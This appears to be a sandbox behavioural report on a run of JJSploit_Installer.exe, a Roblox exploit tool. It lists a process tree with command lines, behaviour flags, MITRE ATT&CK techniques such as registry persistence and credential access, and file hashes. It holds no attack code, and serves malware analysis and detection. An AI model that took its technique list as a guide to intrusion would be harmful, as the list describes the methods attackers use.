        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{EA1EA13D-2B97-4708-921F-AC577ADD4A1F}" /silent
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5140
- - C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
    "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" -app -isInstallerLaunch -clientLaunchTimeEpochMs 0
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of UnmapMainImage
    PID:3336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1704 /prefetch:1
  2⤵
  PID:5740
- C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:MTj12f_BiIeynkPqR-Y-6r2Y0A_iEkro12YrJK8um0Jo06lsZxJaAqD4XLxthKLIClIBxBZiwF5zMY02p8MmnIWmSmZ5zNFKStMkwlD1ZhEl3aGlCCAty6BwcZWhmytNAV7iN9WE7UngmYIDbS-5qnFq-gTNp41_kDAMXvApNsDfOS3-O4oJpSckGrqIdOS-QESToGQvUBp-6TGJPx-I8krVss28zhvKTzU1tFUnQjk+launchtime:1724035510563+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1724035255832001%26placeId%3D4924922222%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D3e85d7e6-7069-4224-a180-c13f58ea8286%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1724035255832001+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:6976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:y31d9pxC_Me_h_LEaKITc7J4hJELL1AMcy40vEp-epmvA9RlMdJI7CCUKaf2pFOL7Mt31oUat_XKCBr9Ej-LS1A0OjlcGbiL9zK2UHuU6nOWKRdc9YOsArKmCizIMoOxPgTSWCRUWuqxO1VVr9wdVYobpoxtzlqXjOKovpZrvQtOE9paId3RMG5XX2n85N12KSIwDdd7syF8kRR1iU7AdQYe-kOD2nosqAzqTVY_tes+launchtime:1724035541392+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1724035255832001%26placeId%3D4924922222%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D5871b595-0b44-48ea-bade-03ec6650609c%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1724035255832001+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:6352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
  2⤵
  PID:6024
- C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:e3R-IOmCScZVSpvOkmbdSK-VTk0VlsEPJUk_F_57i5Lk3dVRGFnYY39W7EOg7QmaR9DCXfQsJ0fykhiO74jg1PlU4jbC9V_rFiRqSSrbj0Rou5iYh_TModNSfQ3cVfaCsoK0FsFx6FAQiFJ2PTBzeDMqRP8nayZc9vTWUP2U3xkDYgptTZxWUq4423OqgTeoBwitjIntjhVR6fgHzWsa9J9ZOZ67EeZDc8c9s7E4eX0+launchtime:1724035612181+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1724035255832001%26placeId%3D4924922222%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3Db21e29d5-8423-4e3f-be75-ba6522d7e83d%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1724035255832001+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8536 /prefetch:1
  2⤵
  PID:508
- C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" roblox-player:1+launchmode:play+gameinfo:hnF49WcrDIoXGvcPkDKOYdam9EvAIYMIZJy0080CvRJT3URsFsDOjmZVXat3lHur1gd1IaxyGO1GGjzyl2zsetP9UjX7lmAvZ3BfDcfWKEfxHVhHbn7k9_xCBcgvtdo6GIz5OvR9Fljh719u3VlAjGmjGIpBjxPdLyJcdZJjOfRQTbABllpcLEWlHq_3uOAfHQdQyExnz-k83IOMO7tE69_mzn2yRR7ZcRHUQImULqs+launchtime:1724035652901+placelauncherurl:https%3A%2F%2Fwww.roblox.com%2FGame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D1724035255832001%26placeId%3D4924922222%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D6df55f4c-b5c9-423e-be0b-3bff6509e443%26joinAttemptOrigin%3DPlayButton+browsertrackerid:1724035255832001+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:2120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3912

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2980 -ip 2980
1⤵
PID:4900

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2980 -ip 2980
1⤵
PID:3480

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3272

C:\Users\Admin\Downloads\JJSploit_Installer.exe
"C:\Users\Admin\Downloads\JJSploit_Installer.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4892

C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe
"C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4392
- C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe
  "C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe" --type=gpu-process --field-trial-handle=1708,16729581289066594403,9870784801593616213,131072 --enable-features=WebComponentsV0Enabled --disable-features=SpareRendererForSitePerProcess --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1720 --ignored=" --type=renderer " /prefetch:2
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2972
- C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe
  "C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe" --type=utility --field-trial-handle=1708,16729581289066594403,9870784801593616213,131072 --enable-features=WebComponentsV0Enabled --disable-features=SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2196 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:2540
- C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe
  "C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe" --type=renderer --field-trial-handle=1708,16729581289066594403,9870784801593616213,131072 --enable-features=WebComponentsV0Enabled --disable-features=SpareRendererForSitePerProcess --lang=en-US --app-path="C:\Users\Admin\AppData\Local\Programs\JJS-UI\resources\app.asar" --no-sandbox --no-zygote --preload="C:\Users\Admin\AppData\Local\Programs\JJS-UI\resources\app.asar\build\preload.js" --enable-remote-module --background-color=#fff --enable-websql --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2208 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/channel/UC3YNONzSHPW12m3AT48fMHw?view_as=subscriber
  2⤵
  PID:4804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa5ca33cb8,0x7ffa5ca33cc8,0x7ffa5ca33cd8
    3⤵
    PID:1112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/c/Omnidev_
  2⤵
  PID:228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa5ca33cb8,0x7ffa5ca33cc8,0x7ffa5ca33cd8
    3⤵
    PID:5800
- C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe
  "C:\Users\Admin\AppData\Local\Programs\JJS-UI\JJS-UI.exe" --type=gpu-process --field-trial-handle=1708,16729581289066594403,9870784801593616213,131072 --enable-features=WebComponentsV0Enabled --disable-features=SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-preferences=KAAAAAAAAADoAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=3160 /prefetch:2
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4704

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:6544
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUExRUExM0QtMkI5Ny00NzA4LTkyMUYtQUM1NzdBREQ0QTFGfSIgdXNlcmlkPSJ7RTUwM0FERkUtNDE5OC00RjY2LTlBNjEtOUQ5RDRBRTI3REVBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntBMTRCNEVCRS1FRUEzLTRCMDUtOUVDOS1DRUYzOTZDNkQ0RDV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjUiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3NjU2Nzc2MTkyIi8-PC9hcHA-PC9yZXF1ZXN0Pg
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6584
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\MicrosoftEdge_X64_127.0.2651.105.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\MicrosoftEdge_X64_127.0.2651.105.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
  2⤵
  - Executes dropped EXE
  PID:6156
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\EDGEMITMP_460CA.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\EDGEMITMP_460CA.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\MicrosoftEdge_X64_127.0.2651.105.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:6264
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\EDGEMITMP_460CA.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\EDGEMITMP_460CA.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.120 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BD349117-58E9-4C07-93B7-4FC2DC4FE206}\EDGEMITMP_460CA.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.105 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7fc77b7d0,0x7ff7fc77b7dc,0x7ff7fc77b7e8
      4⤵
      Drops file in Windows directory
      PID:6300
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUExRUExM0QtMkI5Ny00NzA4LTkyMUYtQUM1NzdBREQ0QTFGfSIgdXNlcmlkPSJ7RTUwM0FERkUtNDE5OC00RjY2LTlBNjEtOUQ5RDRBRTI3REVBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins3Q0VENzY4OS02OTk2LTQ3RDUtQTk0Ni05RTc5RDcxOTEzMzh9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMjcuMC4yNjUxLjEwNSIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTc2NzMwODYyMjMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNzY3MzIyNjIwOSIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3ODc1NTU2MDEyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy84YjBiMzIzMy1kYWFmLTQ4YjktYWEwNC1iMzRiYTllNDI5ODA_UDE9MTcyNDY0MDIxMiZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1YTW1qWFNaSHVVcGpUbG5oTlQlMmJUQnhFRVFEeXlVaTFrVDlkc2tySGZMbVhsOW80OENVQkdFSW01SFo3bGJidEE2T01ycVljWlFESGFSZzBZcGlEODl3JTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTcyNjEyNjY0IiB0b3RhbD0iMTcyNjEyNjY0IiBkb3dubG9hZF90aW1lX21zPSIxMzcyNSIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3ODc1NzY2MDY5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTc4OTA4NDYwMDUiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjE4MzM2MzQ2MTY1IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMTA5OCIgZG93bmxvYWRfdGltZV9tcz0iMjAyNDgiIGRvd25sb2FkZWQ9IjE3MjYxMjY2NCIgdG90YWw9IjE3MjYxMjY2NCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNDQ1NDkiLz48L2FwcD48L3JlcXVlc3Q-
  2⤵
  - Loads dropped DLL
  - Checks system information in the registry
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3020

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\@[email protected]
1⤵
PID:7024

C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
1⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
PID:7012
- C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe
  "C:\Program Files (x86)\Roblox\Versions\version-55d6e65f478642a8\RobloxPlayerBeta.exe" -app -isInstallerLaunch -clientLaunchTimeEpochMs 0
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of UnmapMainImage
  PID:6588

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
1⤵
- Loads dropped DLL
PID:5924

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Loads dropped DLL
- Checks system information in the registry
- System Location Discovery: System Language Discovery
PID:6832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\EdgeCore\127.0.2651.105\Installer\setup.exe

Filesize
6.6MB

MD5
96937bb70ddb5b3a89651ad8391ce5a1

SHA1
3d5ee58c00667b4dc63da7205c20b1c335c3efce

SHA256
60ae19e62277efd9bbdc93ccc5fa8b4bc1f8f6537115d4a7e8e8df3c2014315b

SHA512
d3b1c07157817bfbcaee4bf196a3743dc177470f82880d5bfdd5fce573434a652f7da5f1dbc40a086e0cc6bb9ae4bdb4f8ce86985c8dc01923418724caab6c0e

Download Submit
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

Filesize
201KB

MD5
4dc57ab56e37cd05e81f0d8aaafc5179

SHA1
494a90728d7680f979b0ad87f09b5b58f16d1cd5

SHA256
87c6f7d9b58f136aeb33c96dbfe3702083ec519aafca39be66778a9c27a68718

SHA512
